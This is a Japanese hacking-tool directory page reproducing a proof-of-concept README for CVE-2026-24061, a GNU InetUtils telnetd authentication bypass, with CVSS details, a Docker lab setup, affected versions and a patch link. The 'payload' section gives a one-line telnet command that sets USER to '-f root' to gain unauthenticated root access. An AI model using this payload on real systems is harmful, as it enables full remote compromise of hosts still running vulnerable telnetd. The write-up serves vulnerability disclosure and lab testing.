Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-24061 — GNU InetUtils telnetd の脆弱性により、リモートからのルートアクセスが可能になる | Kitploit
ツール/GitHubGitHub/lucaspdiniz/cve-2026-24061
脆弱性分析エクスプロイトペネトレーションテスト認証リモートアクセスツール
GitHublucaspdiniz/cve-2026-24061

CVE-2026-24061

GNU InetUtils telnetd の脆弱性により、リモートからのルートアクセスが可能になる

リポジトリを見る
7ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

GNU InetUtils telnetd 認証バイパス(引数インジェクション経由)- CVE-2026-24061 📚

はじめに

GNU InetUtils telnetd で最近発見された引数インジェクションの脆弱性により、攻撃者は USER 環境変数を「-f root」に設定することで認証を回避できます。その結果、リモートの未認証攻撃者が脆弱な telnetd サービスを実行しているシステムにアクセスし、root への権限昇格が可能になります。この脆弱性が悪用されると、攻撃者は機密情報へのアクセス、システム設定の変更、任意のコマンド実行が可能になり、システム全体の完全な侵害につながる可能性があります。

CVSS 詳細CNA (MITRE)
基本スコア9.8
ベクターCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
攻撃元区分ネットワーク
攻撃条件の複雑さ低
必要な特権レベルなし
ユーザー操作なし
スコープ変更なし
機密性への影響高
完全性への影響高
可用性への影響高
CVSSv3 バージョン3.1

何が起きたのか?

私たちは、この脆弱性を生み出したコード変更(62行目)を示す、2015年の以下のコミットにアクセスできました。

この README の目的は、この CVE を生成したすべての手順ではなく、エクスプロイトの実行を示すことだけです。ただし、意図としては %U プレースホルダーを USER 環境変数から取得した値に置き換えることです。この特定の環境変数はユーザーが制御可能であり、Telnet プロトコルを介して操作できます 🔥 。

環境 🔓

このテストでは、Docker Hub のイメージを使用して、脆弱なバージョンの InetUtils を含む2つのコンテナを作成しました。

  • コンテナ -> https://hub.docker.com/_/ubuntu
root@kitploit:~
docker run --rm -it --name vuln -p 23:23 ubuntu:22.04 bash
      apt update
      apt install build-essential wget tar
      wget http://ftp.gnu.org/gnu/inetutils/inetutils-2.5.tar.gz
      tar -xvzf inetutils-2.5.tar.gz
      cd inetutils-2.5
      ./configure
      ./configure --enable-telnet
      make clean
      make
      make install
      export PATH=$PATH:/usr/local/libexec
      apt install openbsd-inetd
      echo "telnet  stream  tcp  nowait  root  /usr/local/libexec/telnetd  telnetd" >> /etc/inetd.conf
      service openbsd-inetd restart

docker run --rm -it --name attacker ubuntu bash
      apt install telnet

ペイロード 💀

以下のペイロードを使用して、USER 変数を置き換え、認証システムをバイパスします。

root@kitploit:~
USER="-f root" telnet -a 172.17.0.3

影響を受けるバージョン ✅

  • GNU Inetutils 2.7 までの telnetd はリモート認証を許可します。
  • Ubuntu バージョンの更新に従ってください。 -> https://ubuntu.com/security/CVE-2026-24061

inetutils のバージョンを確認してください

root@kitploit:~
hostname --version
telnetd --version


また次回お会いしましょう :wink:

ツールをダウンロード